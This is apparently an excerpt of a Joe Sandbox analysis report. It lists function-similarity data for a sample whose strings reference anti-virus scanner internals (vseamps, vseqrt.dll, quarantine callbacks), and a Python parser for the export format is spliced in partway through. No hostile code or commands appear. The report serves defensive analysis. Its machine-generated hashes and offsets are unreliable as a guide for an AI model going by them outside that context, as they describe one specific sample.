                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                  • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                  • API String ID: 3682727354-300733478
                                  • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                  • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                  • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                  • API String ID: 2587151837-1427723692
                                  • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                  • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                  • String ID: SetDllDirectoryW$kernel32.dll
                                  • API String ID: 3184163350-3826188083
                                  • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                  • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3424473247-996641649
                                  • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                  • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1775797328-0
                                  • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                  • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                  • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 1232609184-0
                                  • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                  • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
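The per-function blocks in this part of the report are a flattened text export of the IDA-plugin similarity data: an `APIs` header opens each block, followed by `Strings`, `Memory Dump Source`, `Joe Sandbox IDA Plugin` and `Similarity` sections whose bullets hold the API references, the dump the function was lifted from, and the `$`-separated API ID and String ID groups. The following Python is an added example, not code from Joe Sandbox or from this report: it parses that export into records so the String ID and API reference fields can be pivoted on across blocks (which functions touch `vseqrt.dll`, which addresses call into KERNEL32, and so on). `SAMPLE` is a trimmed excerpt of two blocks from this page; the parser assumes the section names and bullet layout visible here, and that no individual string contains a literal `$`, which holds for every String ID on this page.

```python
"""Parse the per-function blocks of a Joe Sandbox text export (added example).
SAMPLE is a trimmed excerpt of two blocks from this report; the parser splits
on the 'APIs' header that opens every block and collects the bullets beneath it."""
import re

SAMPLE = """\
APIs
• GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
• GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
Memory Dump Source
• Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
• String ID:
• API String ID: 1232609184-0
• Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
Similarity
• API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
• String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
• API String ID: 3682727354-300733478
• Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR" as printed under the APIs header
API_CALL = re.compile(r"^(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


def parse_entries(text):
    """Return one dict per function block: apis, strings, dump, similarity."""
    entries, entry, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":          # every block opens with this header
            entry = {"apis": [], "strings": [], "dump": {}, "similarity": {}}
            entries.append(entry)
        if not line or entry is None:
            continue                # skip blanks and a block cut off at the top
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            m = API_CALL.match(item)
            entry["apis"].append(m.groupdict() if m else {"raw": item})
        elif section == "Strings":
            entry["strings"].append(item)
        elif section == "Similarity":   # "Key: value" bullets, one value per key
            key, _, value = item.partition(":")
            entry["similarity"][key.strip()] = value.strip()
        else:                           # dump bullets; "Associated" repeats, so keep lists
            key, _, value = item.partition(":")
            entry["dump"].setdefault(key.strip(), []).append(value.strip())
    return entries


def split_ids(value):
    """'$'-separated groups as the report prints them (assumes no '$' inside a string)."""
    return [part for part in value.split("$") if part]


def base_of(entry):
    """Module base taken from the 'Offset:' field of the Source File line, or None."""
    src = entry["dump"].get("Source File", [""])[0]
    m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", src)
    return int(m.group(1), 16) if m else None


def api_refs(entry, base=None):
    """(api, module, address) per API bullet; address becomes an RVA when base is given."""
    refs = []
    for call in entry["apis"]:
        if "ref" in call:
            refs.append((call["name"], call["module"], int(call["ref"], 16) - (base or 0)))
    return refs


def entries_referencing(entries, needle):
    """Blocks whose String ID field mentions needle (case-insensitive pivot)."""
    needle = needle.lower()
    return [e for e in entries if needle in e["similarity"].get("String ID", "").lower()]


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        base = base_of(e)
        print(hex(base), split_ids(e["similarity"].get("String ID", "")),
              [(n, hex(a)) for n, _, a in api_refs(e, base)])
```

Pointing the script at a full saved export (every block from `APIs` to `Instruction Fuzzy Hash`) gives one record per function; `entries_referencing(entries, "vseamps")` then returns the blocks that carry the `SYSTEM\CurrentControlSet\Services\vseamps\Parameters` key, and `api_refs(e, base_of(e))` converts the `ref:` addresses into RVAs that can be looked up in the dumped module regardless of where it was mapped. The `$` split is only safe because none of the strings on this page contain a literal `$`; a string that did would be cut into pieces.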
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                  • String ID: H
                                  • API String ID: 2107338056-2852464175
                                  • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                  • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                  • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                  • API String ID: 1322048431-2685357988
                                  • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                  • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                  • API String ID: 2984211723-3002863673
                                  • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                  • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                  • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                  • API String ID: 678758403-4129911376
                                  • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                  • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3424473247-0
                                  • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                  • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                  • String ID: bad exception$csm$csm$csm
                                  • API String ID: 3766904988-820278400
                                  • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                  • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                  • String ID:
                                  • API String ID: 2707001247-0
                                  • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                  • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction ID: 1356d442e3e1cbd580c23c4486f58e76ae064cc2ac78e26c56f4437b5130832d
                                  • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction Fuzzy Hash: 31D171B29087458AEF10AF75D4807AE77A0FB55788F984135DA8D6BB55CF38E489CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                  • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                  • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3013587201-537541572
                                  • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction ID: a1cef2cd13d50d612b5117f40123c4705f743849a301ed93bbc353ed06221cba
                                  • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction Fuzzy Hash: 7F41C1B1B19A0281EE25EF36E910EBB2391BF05B90F8C4535DD4D6B794DE3CE8098740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                  • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 1119674940-1966266597
                                  • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                  • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
